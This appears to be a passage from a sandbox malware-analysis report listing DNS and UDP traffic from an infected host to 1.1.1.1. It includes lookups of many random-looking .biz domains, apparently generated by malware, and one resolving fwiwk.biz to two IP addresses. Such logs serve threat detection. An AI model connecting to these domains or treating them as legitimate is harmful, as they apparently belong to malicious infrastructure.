                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:51.900337934 CET53506911.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:53.135230064 CET5888153192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:53.274933100 CET53588811.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:53.515878916 CET4967553192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:54.054069042 CET53496751.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:54.596368074 CET5218753192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:54.736032009 CET53521871.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:55.327843904 CET5706053192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:55.467819929 CET53570601.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:57.328234911 CET5641253192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:57.579166889 CET6481053192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:57.720865011 CET53648101.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:57.889076948 CET53564121.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:59.508991003 CET5918053192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:00.005544901 CET5095253192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:00.111695051 CET53591801.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:00.146229029 CET53509521.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:01.404525042 CET5564953192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:01.545670986 CET53556491.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:01.824590921 CET4959453192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:02.528589964 CET4959453192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:02.632596970 CET53495941.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:02.669601917 CET53495941.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:03.060497999 CET6350053192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:03.200943947 CET53635001.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:04.211405993 CET5776353192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:04.787127018 CET53577631.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:04.886529922 CET6241453192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:05.026611090 CET53624141.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:06.267267942 CET5431553192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:06.414278984 CET53543151.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:06.421060085 CET6430453192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:07.002253056 CET53643041.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:09.217766047 CET5305053192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:09.355587006 CET5702753192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:09.497781992 CET53570271.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:09.770751953 CET53530501.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:11.084727049 CET6240353192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:11.226716995 CET53624031.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:11.252479076 CET5505353192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:11.811748981 CET53550531.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:13.087428093 CET5935553192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:13.641566992 CET53593551.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:13.917392969 CET5550653192.168.2.101.1.1.1
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 26, 2024 08:15:14.059041977 CET | 53 | 55506 | 1.1.1.1 | 192.168.2.10
Nov 26, 2024 08:15:15.649101973 CET | 56743 | 53 | 192.168.2.10 | 1.1.1.1
Nov 26, 2024 08:15:15.790086031 CET | 53 | 56743 | 1.1.1.1 | 192.168.2.10
Nov 26, 2024 08:15:15.890495062 CET | 58172 | 53 | 192.168.2.10 | 1.1.1.1
Nov 26, 2024 08:15:16.394222021 CET | 53 | 58172 | 1.1.1.1 | 192.168.2.10
Nov 26, 2024 08:15:16.416507959 CET | 60939 | 53 | 192.168.2.10 | 1.1.1.1
Nov 26, 2024 08:15:16.562122107 CET | 53 | 60939 | 1.1.1.1 | 192.168.2.10
Nov 26, 2024 08:15:17.298671007 CET | 52620 | 53 | 192.168.2.10 | 1.1.1.1
Nov 26, 2024 08:15:17.440872908 CET | 53 | 52620 | 1.1.1.1 | 192.168.2.10
Nov 26, 2024 08:15:18.149348974 CET | 50302 | 53 | 192.168.2.10 | 1.1.1.1
Nov 26, 2024 08:15:18.712189913 CET | 53 | 50302 | 1.1.1.1 | 192.168.2.10
Nov 26, 2024 08:15:19.613038063 CET | 55334 | 53 | 192.168.2.10 | 1.1.1.1
Nov 26, 2024 08:15:19.779220104 CET | 53 | 55334 | 1.1.1.1 | 192.168.2.10
Nov 26, 2024 08:15:20.127414942 CET | 50951 | 53 | 192.168.2.10 | 1.1.1.1
Nov 26, 2024 08:15:20.697655916 CET | 53 | 50951 | 1.1.1.1 | 192.168.2.10
Nov 26, 2024 08:15:21.107275009 CET | 57960 | 53 | 192.168.2.10 | 1.1.1.1
Nov 26, 2024 08:15:21.248863935 CET | 53 | 57960 | 1.1.1.1 | 192.168.2.10
Nov 26, 2024 08:15:22.561860085 CET | 59753 | 53 | 192.168.2.10 | 1.1.1.1
Nov 26, 2024 08:15:22.702255011 CET | 53 | 59753 | 1.1.1.1 | 192.168.2.10
Nov 26, 2024 08:15:22.893950939 CET | 57612 | 53 | 192.168.2.10 | 1.1.1.1
Nov 26, 2024 08:15:23.454368114 CET | 53 | 57612 | 1.1.1.1 | 192.168.2.10
Nov 26, 2024 08:15:24.949493885 CET | 61696 | 53 | 192.168.2.10 | 1.1.1.1
Nov 26, 2024 08:15:25.090840101 CET | 53 | 61696 | 1.1.1.1 | 192.168.2.10
Nov 26, 2024 08:15:25.091794968 CET | 62366 | 53 | 192.168.2.10 | 1.1.1.1
Nov 26, 2024 08:15:25.231652021 CET | 53 | 62366 | 1.1.1.1 | 192.168.2.10
Nov 26, 2024 08:15:25.690969944 CET | 56645 | 53 | 192.168.2.10 | 1.1.1.1
Nov 26, 2024 08:15:25.996251106 CET | 53 | 56645 | 1.1.1.1 | 192.168.2.10
Nov 26, 2024 08:15:26.773130894 CET | 53280 | 53 | 192.168.2.10 | 1.1.1.1
Nov 26, 2024 08:15:26.912266970 CET | 53 | 53280 | 1.1.1.1 | 192.168.2.10
Nov 26, 2024 08:15:27.587307930 CET | 59021 | 53 | 192.168.2.10 | 1.1.1.1
Nov 26, 2024 08:15:28.157378912 CET | 53 | 59021 | 1.1.1.1 | 192.168.2.10
Nov 26, 2024 08:15:28.245273113 CET | 63581 | 53 | 192.168.2.10 | 1.1.1.1
Nov 26, 2024 08:15:28.389564037 CET | 53 | 63581 | 1.1.1.1 | 192.168.2.10
Nov 26, 2024 08:15:30.393461943 CET | 62987 | 53 | 192.168.2.10 | 1.1.1.1
Nov 26, 2024 08:15:30.674246073 CET | 57369 | 53 | 192.168.2.10 | 1.1.1.1
Nov 26, 2024 08:15:30.691343069 CET | 53 | 62987 | 1.1.1.1 | 192.168.2.10
Nov 26, 2024 08:15:30.814749002 CET | 53 | 57369 | 1.1.1.1 | 192.168.2.10
Nov 26, 2024 08:15:32.931123972 CET | 65327 | 53 | 192.168.2.10 | 1.1.1.1
Nov 26, 2024 08:15:33.103188992 CET | 59623 | 53 | 192.168.2.10 | 1.1.1.1
Nov 26, 2024 08:15:33.246371984 CET | 53 | 59623 | 1.1.1.1 | 192.168.2.10
Nov 26, 2024 08:15:33.490750074 CET | 53 | 65327 | 1.1.1.1 | 192.168.2.10
Nov 26, 2024 08:15:34.736954927 CET | 54034 | 53 | 192.168.2.10 | 1.1.1.1
Nov 26, 2024 08:15:34.877976894 CET | 53 | 54034 | 1.1.1.1 | 192.168.2.10
Nov 26, 2024 08:15:34.976042986 CET | 57171 | 53 | 192.168.2.10 | 1.1.1.1
Nov 26, 2024 08:15:35.618021965 CET | 53 | 57171 | 1.1.1.1 | 192.168.2.10
Nov 26, 2024 08:15:36.908502102 CET | 64123 | 53 | 192.168.2.10 | 1.1.1.1
Nov 26, 2024 08:15:37.110244036 CET | 63572 | 53 | 192.168.2.10 | 1.1.1.1
Nov 26, 2024 08:15:37.253038883 CET | 53 | 63572 | 1.1.1.1 | 192.168.2.10
Nov 26, 2024 08:15:37.464234114 CET | 53 | 64123 | 1.1.1.1 | 192.168.2.10
Nov 26, 2024 08:15:39.007806063 CET | 49714 | 53 | 192.168.2.10 | 1.1.1.1
Nov 26, 2024 08:15:39.487617970 CET | 59418 | 53 | 192.168.2.10 | 1.1.1.1
Nov 26, 2024 08:15:39.556894064 CET | 53 | 49714 | 1.1.1.1 | 192.168.2.10
Nov 26, 2024 08:15:39.632268906 CET | 53 | 59418 | 1.1.1.1 | 192.168.2.10
Nov 26, 2024 08:15:41.123846054 CET | 60516 | 53 | 192.168.2.10 | 1.1.1.1
Nov 26, 2024 08:15:41.209649086 CET | 59466 | 53 | 192.168.2.10 | 1.1.1.1
Nov 26, 2024 08:15:41.349776030 CET | 53 | 59466 | 1.1.1.1 | 192.168.2.10
Nov 26, 2024 08:15:41.841301918 CET | 60516 | 53 | 192.168.2.10 | 1.1.1.1
Nov 26, 2024 08:15:42.178401947 CET | 53 | 60516 | 1.1.1.1 | 192.168.2.10
Nov 26, 2024 08:15:42.178426981 CET | 53 | 60516 | 1.1.1.1 | 192.168.2.10
Nov 26, 2024 08:15:42.574917078 CET | 56805 | 53 | 192.168.2.10 | 1.1.1.1
Nov 26, 2024 08:15:42.717278004 CET | 53 | 56805 | 1.1.1.1 | 192.168.2.10
Nov 26, 2024 08:15:43.976589918 CET | 58608 | 53 | 192.168.2.10 | 1.1.1.1
Nov 26, 2024 08:15:44.243712902 CET | 57529 | 53 | 192.168.2.10 | 1.1.1.1
Nov 26, 2024 08:15:44.392349005 CET | 53 | 57529 | 1.1.1.1 | 192.168.2.10
Nov 26, 2024 08:15:44.533830881 CET | 53 | 58608 | 1.1.1.1 | 192.168.2.10
Nov 26, 2024 08:15:46.004483938 CET | 56517 | 53 | 192.168.2.10 | 1.1.1.1
Nov 26, 2024 08:15:46.144337893 CET | 53 | 56517 | 1.1.1.1 | 192.168.2.10
Nov 26, 2024 08:15:46.718509912 CET | 55182 | 53 | 192.168.2.10 | 1.1.1.1
Nov 26, 2024 08:15:47.287307024 CET | 53 | 55182 | 1.1.1.1 | 192.168.2.10
Nov 26, 2024 08:15:48.281405926 CET | 52645 | 53 | 192.168.2.10 | 1.1.1.1
Nov 26, 2024 08:15:48.421797991 CET | 53 | 52645 | 1.1.1.1 | 192.168.2.10
Nov 26, 2024 08:15:48.830035925 CET | 60687 | 53 | 192.168.2.10 | 1.1.1.1
Nov 26, 2024 08:15:49.392945051 CET | 53 | 60687 | 1.1.1.1 | 192.168.2.10
Nov 26, 2024 08:15:50.608628988 CET | 58821 | 53 | 192.168.2.10 | 1.1.1.1
Nov 26, 2024 08:15:50.748454094 CET | 53 | 58821 | 1.1.1.1 | 192.168.2.10
Nov 26, 2024 08:15:51.543100119 CET | 50853 | 53 | 192.168.2.10 | 1.1.1.1
Nov 26, 2024 08:15:52.110130072 CET | 53 | 50853 | 1.1.1.1 | 192.168.2.10
Nov 26, 2024 08:15:52.343319893 CET | 57129 | 53 | 192.168.2.10 | 1.1.1.1
Nov 26, 2024 08:15:52.483119965 CET | 53 | 57129 | 1.1.1.1 | 192.168.2.10
Nov 26, 2024 08:15:53.405778885 CET | 57558 | 53 | 192.168.2.10 | 1.1.1.1
Nov 26, 2024 08:15:53.834528923 CET | 53 | 57558 | 1.1.1.1 | 192.168.2.10
Nov 26, 2024 08:15:53.835350037 CET | 51698 | 53 | 192.168.2.10 | 1.1.1.1
Nov 26, 2024 08:15:54.401971102 CET | 53 | 51698 | 1.1.1.1 | 192.168.2.10
Nov 26, 2024 08:15:54.721597910 CET | 63976 | 53 | 192.168.2.10 | 1.1.1.1
Nov 26, 2024 08:15:54.861344099 CET | 53 | 63976 | 1.1.1.1 | 192.168.2.10
Nov 26, 2024 08:15:56.143609047 CET | 50506 | 53 | 192.168.2.10 | 1.1.1.1
Nov 26, 2024 08:15:56.284554005 CET | 53 | 50506 | 1.1.1.1 | 192.168.2.10
Nov 26, 2024 08:15:56.285460949 CET | 60967 | 53 | 192.168.2.10 | 1.1.1.1
Nov 26, 2024 08:15:56.424880981 CET | 53 | 60967 | 1.1.1.1 | 192.168.2.10
Nov 26, 2024 08:15:56.593286037 CET | 61662 | 53 | 192.168.2.10 | 1.1.1.1
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:57.174324036 CET53616621.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:58.701555967 CET6362453192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:58.778242111 CET5074453192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:58.843995094 CET53636241.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:59.334947109 CET53507441.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:00.401328087 CET5214953192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:00.541441917 CET53521491.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:01.564575911 CET5583653192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:02.129456997 CET53558361.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:02.806216002 CET6003253192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:02.948649883 CET53600321.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:05.264108896 CET6301053192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:05.826811075 CET53630101.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:07.214745998 CET5220353192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:07.780375004 CET53522031.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:08.019061089 CET5554453192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:08.158997059 CET53555441.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:09.467215061 CET5606353192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:09.611032963 CET53560631.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:09.724323034 CET4935453192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:10.300951958 CET53493541.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:11.177401066 CET6435553192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:11.318342924 CET53643551.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:11.583349943 CET5100853192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:12.160248041 CET53510081.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:12.677089930 CET5411453192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:12.822451115 CET53541141.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:14.161433935 CET6354853192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:14.705224037 CET53635481.1.1.1192.168.2.10
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:41.613444090 CET192.168.2.101.1.1.10xdef6Standard query (0)gytujflc.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:42.225568056 CET192.168.2.101.1.1.10xfdf3Standard query (0)ifsaia.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:44.238214016 CET192.168.2.101.1.1.10xc01Standard query (0)qaynky.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:44.570708036 CET192.168.2.101.1.1.10x5a95Standard query (0)saytjshyf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:46.056684017 CET192.168.2.101.1.1.10x9eddStandard query (0)vcddkls.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:46.997035980 CET192.168.2.101.1.1.10xf083Standard query (0)bumxkqgxu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:48.476106882 CET192.168.2.101.1.1.10xb015Standard query (0)fwiwk.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:49.194992065 CET192.168.2.101.1.1.10xdde1Standard query (0)dwrqljrr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:51.343261957 CET192.168.2.101.1.1.10x6cfdStandard query (0)nqwjmb.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:51.354481936 CET192.168.2.101.1.1.10xf951Standard query (0)tbjrpv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:53.135230064 CET192.168.2.101.1.1.10x45d0Standard query (0)deoci.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:53.515878916 CET192.168.2.101.1.1.10xc875Standard query (0)ytctnunms.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:54.596368074 CET192.168.2.101.1.1.10xc5aaStandard query (0)gytujflc.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:55.327843904 CET192.168.2.101.1.1.10xf02dStandard query (0)myups.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:57.328234911 CET192.168.2.101.1.1.10x3e96Standard query (0)oshhkdluh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:57.579166889 CET192.168.2.101.1.1.10xadf8Standard query (0)qaynky.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:59.508991003 CET192.168.2.101.1.1.10xea69Standard query (0)yunalwv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:00.005544901 CET192.168.2.101.1.1.10x8705Standard query (0)bumxkqgxu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:01.404525042 CET192.168.2.101.1.1.10x91d6Standard query (0)dwrqljrr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:01.824590921 CET192.168.2.101.1.1.10x441fStandard query (0)jpskm.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:02.528589964 CET192.168.2.101.1.1.10x441fStandard query (0)jpskm.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:03.060497999 CET192.168.2.101.1.1.10x9b40Standard query (0)nqwjmb.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:04.211405993 CET192.168.2.101.1.1.10x873dStandard query (0)lrxdmhrr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:04.886529922 CET192.168.2.101.1.1.10x3794Standard query (0)ytctnunms.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:06.267267942 CET192.168.2.101.1.1.10x30f4Standard query (0)myups.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:06.421060085 CET192.168.2.101.1.1.10xa4beStandard query (0)wllvnzb.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:09.217766047 CET192.168.2.101.1.1.10x48dStandard query (0)gnqgo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:09.355587006 CET192.168.2.101.1.1.10xfe1cStandard query (0)oshhkdluh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:11.084727049 CET192.168.2.101.1.1.10x36bbStandard query (0)yunalwv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:11.252479076 CET192.168.2.101.1.1.10x7215Standard query (0)jhvzpcfg.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:13.087428093 CET192.168.2.101.1.1.10x97a7Standard query (0)acwjcqqv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:13.917392969 CET192.168.2.101.1.1.10xe6Standard query (0)jpskm.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:15.649101973 CET192.168.2.101.1.1.10xb2c6Standard query (0)lrxdmhrr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:15.890495062 CET192.168.2.101.1.1.10x38f4Standard query (0)lejtdj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:16.416507959 CET192.168.2.101.1.1.10x5a84Standard query (0)vyome.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:17.298671007 CET192.168.2.101.1.1.10x2fc7Standard query (0)wllvnzb.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:18.149348974 CET192.168.2.101.1.1.10xf197Standard query (0)yauexmxk.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:19.613038063 CET192.168.2.101.1.1.10xaeb5Standard query (0)gnqgo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:20.127414942 CET192.168.2.101.1.1.10xb46Standard query (0)iuzpxe.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:21.107275009 CET192.168.2.101.1.1.10xbd07Standard query (0)jhvzpcfg.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:22.561860085 CET192.168.2.101.1.1.10x96b5Standard query (0)acwjcqqv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:22.893950939 CET192.168.2.101.1.1.10x3352Standard query (0)sxmiywsfv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:24.949493885 CET192.168.2.101.1.1.10x8252Standard query (0)lejtdj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:25.091794968 CET192.168.2.101.1.1.10xa6e3Standard query (0)vyome.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:25.690969944 CET192.168.2.101.1.1.10x69e9Standard query (0)vrrazpdh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:26.773130894 CET192.168.2.101.1.1.10xb496Standard query (0)yauexmxk.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:27.587307930 CET192.168.2.101.1.1.10x1137Standard query (0)ftxlah.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:28.245273113 CET192.168.2.101.1.1.10xd07aStandard query (0)iuzpxe.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:30.393461943 CET192.168.2.101.1.1.10x48ebStandard query (0)typgfhb.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:30.674246073 CET192.168.2.101.1.1.10xb99eStandard query (0)sxmiywsfv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:32.931123972 CET192.168.2.101.1.1.10x6368Standard query (0)esuzf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:33.103188992 CET192.168.2.101.1.1.10xf9bbStandard query (0)vrrazpdh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:34.736954927 CET192.168.2.101.1.1.10xb0dbStandard query (0)ftxlah.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:34.976042986 CET192.168.2.101.1.1.10x2446Standard query (0)gvijgjwkh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:36.908502102 CET192.168.2.101.1.1.10x2dfStandard query (0)qpnczch.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:37.110244036 CET192.168.2.101.1.1.10xa4e1Standard query (0)typgfhb.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:39.007806063 CET192.168.2.101.1.1.10x85dfStandard query (0)brsua.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:39.487617970 CET192.168.2.101.1.1.10x211eStandard query (0)esuzf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:41.123846054 CET192.168.2.101.1.1.10x7f53Standard query (0)dlynankz.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:41.209649086 CET192.168.2.101.1.1.10x9a9aStandard query (0)gvijgjwkh.bizA (IP address)IN (0x0001)false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:34.836090088 CET1.1.1.1192.168.2.100x525bNo error (0)fwiwk.biz172.234.222.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:34.836111069 CET1.1.1.1192.168.2.100x525bNo error (0)fwiwk.biz172.234.222.138A (IP address)IN (0x0001)false
